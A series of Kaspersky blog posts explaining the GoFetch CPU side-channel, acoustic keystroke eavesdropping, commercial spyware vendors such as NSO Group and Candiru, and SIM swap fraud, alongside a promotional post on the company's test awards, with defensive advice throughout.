In mid-March, researchers from several U.S. universities published a paper demonstrating a hardware vulnerability in Apple’s “M” series CPUs. These CPUs, based on the ARM architecture and designed by Apple, power most of its newer laptops and desktops, as well as some iPad models. The issue could potentially be exploited to break encryption algorithms. The attack that uses this vulnerability was dubbed “GoFetch”.

The combination of a juicy topic and a big-name manufacturer like Apple led to this highly technical paper being picked up by a wide range of media outlets — both technical and not so much. Many ran with alarmist headlines like “Don’t Trust Your Private Data to Apple Laptops”. In reality, the situation isn’t quite that dire. However, to really get to the bottom of this new problem, we need to delve a little into how CPUs work — specifically by discussing three concepts: data prefetching, constant-time programming, and side-channel attacks. As always, we’ll try to explain everything in the simplest terms possible.

Data prefetching

The CPU of a desktop computer or laptop executes programs represented as machine code. Loosely speaking, it’s a bunch of numbers — some representing instructions and others representing data for calculations. At this fundamental level, we’re talking about very basic commands: fetch some data from memory, compute something with this data, and write the result back to memory.

You’d think these operations should be executed in this order. Here’s a simple example: a user enters their password to access a cryptocurrency wallet. The computer needs to read the password from RAM, run a few computing operations, check that this is the correct password, and only then grant access to the confidential data. If this were the way today’s CPUs executed all code, our computers would be painfully slow. So how do you speed things up? You do a lot of optimization — such as data prefetching.

Data prefetching works like this: if the program code contains a command to fetch data, why not load it ahead of time to speed things up? Then, should the data come in handy at some point, we’ve just made the program run a bit faster. No big deal if it doesn’t come in handy: we’d just discard it from the CPU’s cache and fetch something else.

That’s how basic data prefetching works. Apple CPUs make use of a newer prefetcher known as “data memory-dependent prefetcher”, or DMP. In a nutshell, DMP is more aggressive. Commands to fetch data from memory are not always explicit. Pointers to specific memory locations might be the result of computing work that still needs to be performed, or they might be stored in a data array that the program will access later. DMP tries to guess which data in the program is a pointer to a memory location. The logic is the same: if something looks like a pointer, try fetching data at that address. The guessing process relies on the history of recent operations — even if they belong to a completely different program.

In 2022, another study demonstrated that DMP tends to confuse pointers with other data the program is working with. This isn’t necessarily a problem by itself — loading the wrong stuff into the CPU cache isn’t a big deal. But it becomes a problem when it comes to encryption algorithms. DMP can break constant-time programming under certain conditions. Let’s talk about this next.

Constant-time programming

There’s a simple rule: the time it takes to process data must not depend on the nature of that data. In cryptography, this is a fundamental principle for protecting encryption algorithms from attacks. Often, malicious actors try to attack the encryption algorithm by feeding it data and observing the encrypted output. The attacker doesn’t know the private key used to encrypt the data. If they figure out this key, they can decrypt other data, such as network traffic or passwords saved in the system.

Poor encryption algorithms process some data faster than others. This gives the malicious actor a powerful hack tool: simply by observing the algorithm’s runtime, they can potentially reconstruct the private key.

Most encryption algorithms are immune to this type of attack: their creators made sure that computing time is always the same, regardless of the input data. Algorithm robustness-tests always include attempts at violating this principle. This is what happened, for example, in the Hertzbleed attack. However, to make actual key theft possible, the attack must use a side channel.

Side-channel attack

If DMP prefetching sometimes confuses regular application data with a memory pointer, does that mean it can mistake a piece of a private key for a pointer? It turns out it can. The researchers demonstrated this in practice using two popular data encryption libraries: Go Crypto (Go developers’ standard library), and OpenSSL (used for network traffic encryption and many other things). They investigated various encryption algorithms — including the ubiquitous RSA and Diffie-Hellman, as well as Kyber-512 and Dilithium-2, which are considered resistant to quantum computing attacks. By trying to fetch data from a false pointer that’s actually a piece of a private key, DMP essentially “leaks” the key to the attacker.

There’s one catch: the hypothetical malware needed for this attack has no access to the cache. We don’t know what DMP loaded there or which RAM address it fetched the data from. However, if a direct attack isn’t possible, there’s still a chance of extracting information through a side channel. What makes this possible is a simple feature of any computer: data loaded into the CPU cache is processed faster than data residing in regular RAM.

Let’s put this attack together. So, we have malware that can feed arbitrary data to the encryption algorithm. The latter loads various data into the cache, including a secret encryption key. DMP sometimes mistakenly fetches data from an address that’s actually a piece of this key. The attacker can find out indirectly that data has been prefetched from a certain address by measuring the time it takes the CPU to access certain pieces of data: if the data was cached, accessing it will be slightly faster than otherwise. This was exactly how the researchers broke the constant-time programming principle: we can feed arbitrary text to the algorithm and watch the processing time vary.

So, is your data at risk?

In practice, extracting an encryption key requires dozens to hundreds of thousands of computing operations as we feed data into the algorithm and indirectly monitor cache status. This is a sure-fire attack, but a very resource-intensive one: stealing a key takes an hour at best — more than ten hours at worst. And for all this time, the computing effort will keep the device running almost at full capacity. The GoFetch website has a video demonstration of the attack, where the private key is extracted bit by bit — literally.

However, that’s not what makes the attack impractical. We’ve repeatedly mentioned that the attack requires malware to be installed on the victim’s computer. As you can imagine, if this is the case, the data is already compromised by definition. There are likely far simpler ways to get to it at this point. This is the reason why the OpenSSL developers didn’t even consider the researchers’ report: such attacks fall outside their security model.

All studies like this can be compared to civil engineering. To make a structure robust, engineers need to study the characteristics of the materials to be used, the given location’s soil properties, make provisions for the risk of earthquakes, and do many other things. In most cases, even a poorly constructed building will stand for decades without problems. However, a rare combination of circumstances may lead to disaster. Attack scenarios like GoFetch are designed to avert such disasters that lead to mass leaks of user secrets.

The researchers are going to continue studying this fairly new prefetching mechanism. Intel processors also use it starting with the 13th generation, but they’ve proved insusceptible to this particular kind of attack proposed in the research paper. What’s important is that the vulnerability can’t be patched: it will continue to affect Apple’s M1 and M2 CPUs for their entire lifespan. The only way to prevent this type of attack is by modifying encryption algorithms. One possibility involves restricting the calculations to the CPU’s “energy-efficient” cores, as DMP only works on “high-performance” cores. Another one is obfuscating encryption keys before loading them into RAM. A side effect of these methods is performance degradation — but the user would hardly even notice. In turn, Apple M3 CPUs feature a special flag that disables DMP optimization for particularly sensitive operations.

Let’s summarize. There’s no immediate threat to data stored on Apple devices — hardly anyone would try using a technique this complex to steal that data. Nevertheless, the work of these U.S. researchers is still valuable because it sheds some light on hitherto-unknown operating aspects of how the latest CPUs work. Their efforts aim to prevent future problems that might arise if an easier exploit is discovered.

Kaspersky official blog – ​Read More

U.S. researchers recently published a paper demonstrating that useful information can be extracted from the sounds of keystrokes. This is certainly not the first study of its kind; moreover, the results can’t even be considered more accurate than the conclusions of its predecessors. However, what makes this one interesting is that the researchers weren’t aiming for perfect, lab-controlled conditions. Instead, they wanted to see how it works in fairly realistic conditions: a somewhat noisy room, a not-so-great microphone, and so on.

Attack model

We often get eavesdropped on without even realizing it. And I’m not referring to spy movie clichés with bugs planted in offices and hotel rooms.

Imagine you’re stuck in a boring conference call at work and, at the same time, you’re discreetly catching up on work emails or personal messages without muting your microphone. Guess what? Your colleagues can hear your keystrokes. Streamers — those who love broadcasting their gaming sessions (and other stuff) — are also at risk. They might get distracted mid-stream and, for example, type a password on the keyboard. While the keyboard itself may not be visible, someone could record the sound of the keystrokes, analyze the recording, and try to figure out what was typed.

The first scientific study examining such an attack in detail was published in 2004. Back then, IBM researchers merely proposed a method and demonstrated the basic possibility of distinguishing one keystroke from another, but nothing more. Five years later in 2009, the same researchers attempted to solve the problem using a neural network: a special algorithm was trained on a 10-minute recording of keyboard input, with the text known in advance. This made it possible to associate specific keystroke sounds with typed letters. As a result, the neural network recognized up to 96% of the characters typed.

However, this result was obtained in a lab-controlled environment. The room was completely silent, a high-quality microphone was used, and the text was typed more or less consistently (with roughly the same typing speed and keystroke force). Moreover, a loud mechanical keyboard was used. This study demonstrated the theoretical possibility of an attack, but its results were difficult to apply in practice: if you change the typing style slightly, change the keyboard, or add natural ambient noise to the room, recognition becomes impossible.

Real-life eavesdropping

Everyone has their own unique way of typing. The researchers found patterns in these individual styles, which helped them analyze the sounds of keystrokes. For instance, they discovered that people tend to type common letter pairs at a consistent speed. They also found that it’s fairly easy to distinguish individual words, since the sounds of the spacebar and Enter key are usually distinct from other keys.

During the experiments, the researchers assumed that the potential eavesdropping victim would be typing in an office with a normal level of background noise. Other than that, there were no special restrictions on the participants. They could use any keyboard and type however they wanted. The recording was done on a low-quality, built-in laptop microphone. For a successful attack, however, a potential spy needs to record a sufficiently long sequence of keystrokes — otherwise, it won’t be possible to train the neural network. The recording looks something like this:

Each peak in amplitude corresponds to a specific keystroke. The pause between keystrokes may vary depending on the user’s typing skill and the sequence of letters being typed. In this study, the neural network was trained to recognize these pauses specifically, and as it turns out, they also carry a lot of information — no less than the differences in keystroke sounds themselves!

An important breakthrough in this new study was the use of the neural network to predict whole words. For example, if the neural network identifies the word “goritla” from the keystrokes, then we can confidently assert that the user actually typed “gorilla”, and there was just an error in recognition. The more letters in a word, the more accurately it can be guessed. This rule applies to up to six-letter words — beyond which the accuracy doesn’t increase.

A total of 20 volunteers participated in the experiment. First, they typed an already-known text, which was then correlated with the keystroke sounds and used to train the recognition algorithm. Next, the subjects typed a secret text, which the neural network tried to decipher based on the typing patterns and how well it matched real words. The accuracy varied from person to person, but on average the AI correctly guessed 43% of the text just from the keystroke sounds.

Side channels all around us

This is yet another example of a side-channel attack — when information is leaked indirectly. We’ve written a lot about such attacks. For example, here is a method of espionage using a light sensor. Here we talked about extracting sound from video data by analyzing tiny vibrations in the image. Phone conversations can be eavesdropped on using an accelerometer – the sensor built into every smartphone. The indirect channels of information leakage are indeed many.

But out of all these attacks, extracting text by analyzing keystroke sounds is the most viable in practice. When we enter a credit card number or password, we can hide the keyboard from prying eyes, but protecting yourself from eavesdropping isn’t so easy.

Of course, a 43% accuracy rate in guessing the text might not sound that impressive — especially considering it’s guessing whole words, not random characters like you’d expect in a password. Still, this new research is a significant step toward making this type of attack practical. It’s not quite there yet, but imagine someone in a café or on the train potentially stealing your password, credit card number, or even your private messages just by listening to you typing.

Perhaps future research will bring us closer to this dangerous scenario. But even now we can outline methods of protecting against such attacks and start applying them to particularly sensitive data right away. For starters, avoid typing passwords or other secret information during conference calls — especially during public online events. For many reasons, we recommend using two-factor authentication — it protects well against various password compromise scenarios.

Finally, there’s a way to counteract this specific side-channel attack. It’s based on the fact that you have a certain consistent pattern of typing on the keyboard. Want to make it harder for those sneaky hackers? Break the pattern: mix up your typing style. Both super-slow and super-fast typing can work wonders.

Kaspersky official blog – ​Read More

Choosing the right cybersecurity solution is no easy task. Friends’ opinions and/or crowdsourced ratings — which are great for simpler products and services — are less reliable. While these can help with assessing user interfaces and overall usability, they’re not much good for assessing the quality of protection against advanced threats.

The most balanced, objective source is independent expert research by specialized testing labs and media. Yes, independent — they must have no ties to any vendor whose products they evaluate whatsoever.

We’ve always take independent testing of our products and services seriously. And for a quick and easy way to evaluate just how well we’ve been doing down the years, our website has a Top-3 section, which shows the number of tests taken part in during a year, and in how many we podiumed.

2023 was a record year for us: out of precisely a hundred tests featuring our solutions, 93 times we came first, and 94 times finished in the top-three. And since 2013, our products have been tested by independent researchers a total of 927 times, claiming 680 first places (and 779 top-three finishes). This is the absolute record among all security solutions vendors both in terms of the number of tests and the number of victories.

Now for a little more detail.

Most significant awards

Last year’s achievements are too numerous to list in their entirety, so we’ll highlight the most outstanding:

Kaspersky Standard was named Product of the Year by AV-Comparatives. So pleased were we, we even dedicated a separate blog post to the story.
Kaspersky Plus for Windows underwent all of SE Labs’ quarterly Endpoint Security: Home 2023 tests, and earned the highest total accuracy rating of 100% in all four of them.
Kaspersky Safe Kids was awarded Parental Control certification by AV-Comparatives for blocking at least 98 percent of pornographic websites with zero false positives on child-friendly websites.
Kaspersky Plus for Mac picked up its first Best MacOS Security Award for Consumer Users from AV-Test, with perfect results in its Mac security testing over the course of the whole year.
A trio of our products – Kaspersky Standard, Kaspersky Endpoint Security for Business and Kaspersky Small Office Security – won AV-Test’s Best Advanced Protection 2023 award for exceptional protection against APT attacks deploying ransomware and data stealers. These products also received the Best Usability 2023 award for the lowest number of false positives, the maximum score in all categories (including protection, performance, and usability), as well as the “Top Product” award based on AV-TEST’s results for Windows antivirus software for both home and business.
Kaspersky Endpoint Detection and Response gained recognition as “Strategic Leader” for achieving a 100% active response cumulative score in AV-Comparatives’ Endpoint Prevention & Response (EPR). The solution was also awarded AV-TEST’s Approved Advanced Endpoint Detection and Response Certification for demonstrating impressive coverage and valuable analytics in a study that involved a series of red-team attacks that replicated the tactics of both the Hafnium and Lazarus hacking groups. Additionally, the solution was recognized by SE Labs in its Enterprise Advanced Security (EDR) test, receiving the highest AAA rating for detecting all targeted attacks with no false positives.
Kaspersky Endpoint Security for Business and Kaspersky Small Office Security were awarded AAA ratings in all SE Labs’ Endpoint Security: Enterprise 2023 and Endpoint Security: SMB 2023 comparative tests, respectively.

Who does the testing?

For those unfamiliar with the world of cybersecurity testing, here’s a rundown of the key players.

AV-Comparatives is an independent Austrian organization that’s been testing security products for over 24 years. During this time, what started out as a student project at the University of Innsbruck has grown into one of the most influential research centers in cybersecurity.
AV-Test GmbH is an independent German information-security research institute. It has been advising industry associations, companies, and government agencies on cybersecurity for more than 15 years.
SE Labs is an independent UK company that has developed next-generation product testing based on a comprehensive approach to security assessment.

Alternative approach

Of course, besides serious testing labs, there are specialized media and bloggers that evaluate security software. Their research may be a little less meticulous, but in terms of the grabbing of users’ attention (aka “influencing”:), YouTubers and tech wordsmiths can’t be beat.

If this format floats your boat, we recommend checking out tests (for example, 1, 2 and 3) on the PC Security Channel, run by a UK-based YouTuber. The channel’s killer feature is the many tech gurus among its subscribers, who like to cast a critical eye over the posted content and add their own valuable observations.

Kaspersky official blog – ​Read More

Commercial spyware has of late been making the headlines with increasing frequency. And we’re not just talking about media channels dedicated to IT or cybersecurity; reports on commercial spyware have been appearing regularly in mainstream media for some time now.

In this post, we discuss the existing commercial spyware packages, how they operate, what they’re capable of, and why they’re dangerous. And as always, we finish with advice on how to defend against them.

What is commercial spyware?

Let’s start with a definition. Commercial spyware is legal malware created by private companies and designed to conduct targeted surveillance and collect sensitive data from users’ devices. The standard tasks of commercial spyware include stealing messages, eavesdropping on calls, and tracking location.

To install commercial spyware on a victim’s device, attackers often use zero-day vulnerabilities, and in many cases — zero-click exploits, which make infection possible without requiring any action on the part of the victim.

Spyware always tries to be as inconspicuous as possible, for the longer the victim remains unaware of the infection, the more information attackers can gather. Moreover, commercial spyware often includes tools for removing traces of infection, so victims may not even suspect afterward that someone was monitoring them.

Although commercial spyware is developed by private companies, they typically sell it to various government organizations — primarily law enforcement and other security agencies.

As a result, commercial spyware is used, among other things, to monitor civilian activists, journalists, and other non-criminal individuals. In fact, that’s exactly why spyware programs regularly make the headlines.

1. Pegasus — NSO Group

Targeted OS: iOS, Android

Zero-day vulnerability exploitation: Apple iOS, Apple Safari, WhatsApp, Apple iMessage

Zero-click exploit use: yes

Country of origin: Israel

Alternative names: Chrysaor, DEV-0336, Night Tsunami

Now let’s talk about specific companies, starting with the most prominent player in the commercial spyware market — the notorious Israeli NSO Group, developer of the iOS spyware Pegasus, and its Android version Chrysaor. The early version of Pegasus, discovered in 2016, required the victim to click on a sent link, which opened a malicious page in a browser, which in turn triggered an automatic infection mechanism using the Trident exploit.

The ability to infect iPhones using zero-click exploits quickly became a hallmark of Pegasus. For example, a few years ago, an attack on Apple smartphones exploited a vulnerability in WhatsApp voice calls activated with a series of malicious packets. The vulnerability, in turn, enabled remote code execution on the targeted device.

The FORCEDENTRY exploit, discovered by Citizen Lab in 2021 and thoroughly researched by the Google Project Zero team, is the most notorious. It was designed to attack the Apple iMessage system, enabling spyware to be launched on the victim’s iPhone after sending them a message containing a GIF file.

However, this file wasn’t an animated image at all but rather an infected PDF document in which a compression algorithm was used. When the victim’s smartphone attempted to preview the document, a vulnerability in the program responsible for handling this compression algorithm was triggered, leading to execution of a chain of exploits and, ultimately, infection of the device.

After this exploit was discovered, Apple patched the vulnerabilities. However, as it later turned out, NSO Group simply moved on to exploit vulnerabilities in other applications as if nothing had happened. In April 2023, the same Citizen Lab published research on the FINDMYPWN and PWNYOURHOME exploits. The former was linked to a vulnerability in Apple’s Find My app, while the latter targeted its HomeKit. However, the ultimate target for both of these exploits was the same: the iMessage messaging system.

Finally, in September 2023, Citizen Lab released information about another exploit used by NSO Group: BLASTPASS. This exploit works similarly — also activating a vulnerability in iMessage — but this time related to the mechanism for sending Apple Wallet objects, such as event tickets, in messages.

Regardless of the specific attack vector, infection results in attackers gaining access to the victim’s messages, intercepting calls, stealing passwords, and tracking location. The geographical reach of this spyware is massive — and the corresponding section of the Pegasus Wikipedia entry occupies an impressive amount of space.

2. DevilsTongue, Sherlock — Candiru

Targeted OS: Windows, macOS, iOS, Android

Zero-day vulnerability exploitation: Microsoft Windows, Google Chrome

Zero-click exploit use: likely

Country of origin: Israel

Alternative names: SOURGUM, Caramel Tsunami, Saito Tech Ltd.

Another Israeli company that develops commercial spyware is Candiru, founded in 2014. In fact, this is only the first of the various names this cyber-espionage organization have used. Since they constantly change their moniker, it’s likely they’re working under a different one now. It’s known that Candiru is backed by several investors associated with NSO Group. However, unlike NSO Group, Candiru is much more secretive: the company has no website, its employees are forbidden to mention their employer on LinkedIn, and in the building where Candiru has its office, you won’t find any mention of it.

Candiru’s activities have not been thoroughly studied yet — all the information we have is limited to leaked documents and a couple of incident investigations involving spyware developed by this company. For example, Microsoft’s investigation uncovered several zero-day vulnerabilities in the Windows operating system that Candiru exploited. There were also several zero-days in the Google Chrome browser, which Candiru probably exploited as well.

The company’s spyware is called DevilsTongue, and has multiple attack vectors — from hacking devices with physical access and using the man-in-the-middle method, to spreading malicious links and infected MS Office documents.

Candiru also offers a spy tool called Sherlock, which the researchers at Citizen Lab say could be a platform for zero-click attacks on various operating systems — Windows, iOS, and Android. Furthermore, there are reports that Candiru was developing spyware for attacks on macOS.

3. Alien, Predator — Cytrox / Intellexa

Targeted OS: Android, iOS

Zero-day vulnerability exploitation: Google Chrome, Google Android, Apple iOS

Zero-click exploit use: no (but something similar where the Mars complex is used)

Country of origin: North Macedonia / Cyprus

Alternative names: Helios, Balinese Ltd., Peterbald Ltd.

Alien is one of the two components of this spyware. It’s responsible for hacking the targeted device and installing the second part — necessary for setting up surveillance. This second part is called Predator — in homage to the movie.

The spyware was initially developed by Cytrox, founded in 2017. Its roots are in North Macedonia, with related subsidiary companies registered in both Israel and Hungary. Cytrox was later acquired by Cyprus-registered Intellexa, a company owned by Tal Dilian, who served 24 years in high-ranking positions in Israeli military intelligence.

The Alien/Predator spyware focuses on attacks on both the Android and iOS operating systems. According to last year’s Google Threat Analysis Group study, the developers of the Android version of Alien utilized several exploit chains — including four zero-day vulnerabilities in Google Chrome and one in Android.

Alien/Predator attacks started with messages to victims containing malicious links. Once clicked, these links directed victims to the attackers’ website, which exploited the vulnerabilities in the browser (Chrome) and OS (Android) to infect the device. It then immediately redirected the victim to a legitimate page to avoid suspicion.

Intellexa also offers the Mars spyware suite — part of which is installed on the victim’s mobile-operator’s side. Once installed, Mars waits for the targeted individual to visit an HTTP page, and when they do they use the man-in-the-middle method to redirect the victim to the infected site — at which point the process described in the previous paragraph triggers.

Infection by the Predator spyware using Mars occurs without any action on the part of the victim. This resembles a zero-click attack; however, in this case, additional equipment is used instead of vulnerabilities.

4. Subzero — DSIRF

Targeted OS: Windows

Zero-day vulnerability exploitation: Microsoft Windows, Adobe Reader

Zero-click exploit use: no

Country of origin: Austria

Alternative names: KNOTWEED, Denim Tsunami, MLS Machine Learning Solutions GmbH

The spyware Subzero, developed by the lengthily-named Austrian company DSR Decision Supporting Information Research Forensic GmbH (DSIRF), was first picked up by the German-speaking press back in 2021. However, it wasn’t until a year later that this spyware truly gained notoriety. In July 2022, the Microsoft Threat Intelligence team released a detailed study of spyware used by a group codenamed KNOTWEED (Denim Tsunami), which the researchers identified as DSIRF Subzero.

To compromise targeted systems, the Subzero malware exploited several zero-day vulnerabilities in both Windows and Adobe Reader. The attack vector typically involved sending the victim an email containing a malicious PDF file, which triggered a chain of exploits upon opening. As a result, bodiless spyware was launched on the victim’s device.

In the next stage, the spyware collected any passwords and other authentication credentials it could find in the infected system — from browsers, email clients, the Local Security Authority Subsystem Service (LSASS), and the Windows password manager. Presumably, these credentials were later used to gather information about the victim and set up further surveillance.

According to the researchers, the Subzero malware has been used to attack organizations in Europe and Central America since at least 2020. The researchers also noted that DSIRF not only sold spyware but also arranged for its employees to participate in the attacks.

In August 2023, it was announced that DSIRF would be shutting down. But it’s too early to rejoice just yet: it’s possible that cyber-espionage activities will be continued by DSIRF’s subsidiary — MLS, Machine Learning Solutions — which is believed to be the current owner of the Subzero spyware. By the way, the MLS website is still fully operational — unlike the DSIRF page, which was “under maintenance” at the time of writing.

5. Heliconia — Variston IT

Targeted OS: Windows, Linux

Zero-day vulnerability exploitation: Microsoft Defender, Google Chrome, Mozilla Firefox

Zero-click exploit use: no

Country of origin: Spain

Alternative names: none

Also in 2022, around the same time Microsoft published details about Subzero’s activities, Google presented its research analyzing another type of commercial spyware — Heliconia. The Google Threat Analysis Group (TAG) report described three components of this malware designed for attacks on computers running Windows or Linux.

The first part — called Heliconia Noise — exploits a vulnerability in the Google Chrome V8 JavaScript engine. Following its exploitation, Chrome’s sandbox is bypassed, and the spyware launches in the targeted system. Additionally, in the code of this part, a fragment was found mentioning Variston as the malware developer. The Google researchers believe it references the Spanish company Variston IT. This company specializes in providing information security services.

The second part of the spyware suite, which the Google researchers dubbed Heliconia Soft, exploits a vulnerability in the JavaScript engine embedded in the Windows antivirus, Microsoft Defender. This works as follows: first, the victim is sent a link to an infected PDF file containing malicious JavaScript code. This code triggers the Microsoft Defender vulnerability when the automatic scan of the downloaded PDF file starts. As a result of exploiting this vulnerability, Heliconia gains OS-level privileges and the ability to install spyware on the victim’s computer.

The third part is called Helicona Files. It exploits a vulnerability in the XSLT processor of the Mozilla Firefox browser to attack computers running Windows or Linux. Judging by this vulnerability, which affects Firefox versions 64 through 68, the spyware was developed quite some time ago and has been in use since at least 2018.

6. Reign — QuaDream

Targeted OS: iOS

Zero-day vulnerability exploitation: Apple iOS

Zero-click exploit use: yes

Country of origin: Israel / Cyprus

Alternative names: DEV-0196, Carmine Tsunami, InReach

QuaDream is another Israeli company that develops spyware called Reign. It was founded by former employees of NSO Group, and the spyware they’ve created bears a striking resemblance to Pegasus. For example, to infect iPhones with Reign spyware, they utilize a zero-click exploit similar to FORCEDENTRY, described above.

Citizen Lab researchers have dubbed this exploit ENDOFDAYS. Apparently, this exploit utilizes vulnerabilities in iCloud Calendar as the initial attack vector, enabling attackers to discreetly infect an iPhone by sending invisible malicious invitations to the calendar.

As for the spying capabilities of the iOS version of Reign, the list looks impressive:

searching files and databases
recording calls
listening through the microphone
taking photos with either front or rear cameras
stealing passwords
generating iCloud two-factor authentication one-time codes
tracking location
erasing traces of device infection

According to some reports, QuaDream has also developed malware for attacking Android devices, but there’s no publicly available information about it. QuaDream’s penchant for secrecy is similar to that of Candiru. QuaDream also lacks a website, its employees are prohibited from discussing their work on social media, and the company’s office can’t be found on Google Maps.

Interestingly, QuaDream used an intermediary, the Cypriot company InReach, to sell its products. The relationship between these two companies is very complicated; at one point, they even went to court. In April 2023, shortly after publication of the Citizen Lab investigation into QuaDream, the company suddenly announced cessation of its operations; however, it’s not entirely clear yet whether this is a complete surrender or a tactical retreat.

How to defend against commercial spyware

Ensuring full protection against attacks using commercial spyware is generally challenging. However, you can at least make life harder for potential attackers. Follow these recommendations:

Regularly update the software on all your devices. First and foremost: operating systems, browsers, and messaging apps
Do not click on suspicious links — one visit to a site may be enough to infect your device
Use a VPN to mask your internet traffic — this will protect you from being redirected to a malicious site while browsing HTTP pages
Reboot regularly. Often, spyware can’t persist in an infected system indefinitely, so rebooting helps get rid of it
Install a reliable security solution on all your devices
And of course, read security expert Costin Raiu’s post for more tips on how to protect yourself from Pegasus and similar spyware

Kaspersky official blog – ​Read More

Today’s topic is SIM swap fraud, aka SIM swapping. This attack method is far from new but remains a live threat because of how effective it is. SIM swapping attacks pose a serious danger to business because they enable threat actors to gain access to corporate communications, accounts, and sensitive information like financial data.

What is SIM swapping?

SIM swapping is an attack method for hijacking a mobile phone number and transferring it to a device owned by the attackers. Put simply, said attackers go to a mobile telecoms operator’s office, somehow wangle a new SIM card with the number of a victim-to-be (see below for examples of how), insert it into their own phone, and thus gain access to the target’s communications.

It’s typically text messages that are of most interest to the attackers — specifically ones that contain one-time verification codes. Having gained access, they can then log in to accounts linked to the phone number and/or confirm transactions using the intercepted codes.

As for the SIM swapping process itself, there are various approaches by the bad guys. In some cases the criminals employ the services of an accomplice working for the mobile operator. In others, they deceive an employee using forged documents or social engineering.

The fundamental issue that makes SIM swapping possible is that in today’s world, SIM cards and cell phone numbers are not used solely for their designated purpose. They were not originally intended to serve as proof-of-identity which they’ve evolved into.

Now, one-time codes by text are a very common means of account security, which means that all other protective measures can be rendered null and void by a fraudster who smooth-talked a store employee into issuing a new SIM card with your number. Such a threat cannot be ignored.

For the targeted organization, a SIM swapping attack can hit the bottom line hard. Cybercriminal interest in cryptocurrency assets continues to grow as they can be hijacked relatively easily and, more importantly, quickly. However, this method can be applied in more sophisticated attacks, too.

U.S. Securities and Exchange Commission loses X account

For instance, here’s a very recent case. On January 9, 2024, the U.S. Securities and Exchange Commission (SEC) posted on X (Twitter) that it had approved a Bitcoin spot exchange-traded fund (ETF).

This Bitcoin-boosting event had long been in the pipeline, so the news didn’t strike anyone as implausible. Naturally, in the wake of the announcement, the Bitcoin price soared (by roughly 10% to $48,000).

However, the post was later deleted and replaced with a message that the SEC account had been compromised. The next day, X issued a statement saying that the compromise was due not to a breach of its systems, but to an unidentified individual who had obtained control over a phone number associated with the @SECGov account. Most likely, the jump in the Bitcoin price caused by the fake post meant the fraudster made a killing.

Then, toward the end of January, the SEC itself officially acknowledged that its X account had been hacked by SIM swappers. On top of that, it turned out that two-factor authentication (2FA), at the request of SEC staff, had been disabled by X support in July 2023 to resolve login issues. The issues duly resolved, they then simply forgot to turn 2FA back on — so until the January incident, the account was left without additional protection.

$400 million FTX crypto heist

It was only recently revealed that one of the largest crypto heists in history was carried out using SIM swapping. We’re talking about the theft of $400 million worth of assets from the FTX crypto exchange in the fall of 2022.

Initially, many suspected that FTX founder Sam Bankman-Fried himself was behind the heist. However, the ensuing investigation showed that he appeared to have nothing to do with it. Then came the indictment of a “SIM swapping group” headed by a certain Robert Powell.

The text of the indictment gave us the details of this heist, which, incidentally, was neither the gang’s first nor its last. The list of victims of its SIM-swap operations runs into the dozens. The indictment goes on to mention at least six more cases, in addition to FTX, involving the theft of large sums of money.

Here’s how the criminals operated: first, they selected a suitable victim and obtained their personal information. Next, one of the perpetrators forged documents in the victim’s name, but with the photo of another criminal — the one doing the actual SIM swap.

The latter criminal then paid a visit to the respective mobile operator’s office and got a replacement SIM card. Text messages with confirmation codes sent to the victim’s number were then intercepted and used to log in to the latter’s accounts and approve transactions for the transfer of assets to the gang. Interestingly, the very next day after the FTX heist, the group robbed a private individual in the exact same way to steal a modest-by-comparison $590,000.

How to guard against SIM swapping

As we see, in cases involving serious amounts of money, your SIM card and, accordingly, 2FA through one-time codes by text become the weak link. As the above examples show, SIM swapping attacks can be extremely effective; therefore, threat actors will doubtless continue to use them.

Here’s what to do to protect yourself:

Wherever possible, instead of a phone number, use alternative options to link your accounts.
Be sure to turn on notifications about account logins, pay close attention to them, and respond to suspicious logins as quickly as possible.
Again, where possible, avoid using 2FA with one-time codes by text.
For your 2FA needs, it’s better to use an authenticator app and a FIDO U2F hardware key — commonly called YubiKeys after the best-known brand.
Always use strong passwords to protect your accounts – this means unique, very long, and preferably randomly generated. To generate and store them, use a password manager.
And remember to protect those devices where passwords are stored and authenticator apps are installed.

Kaspersky official blog – ​Read More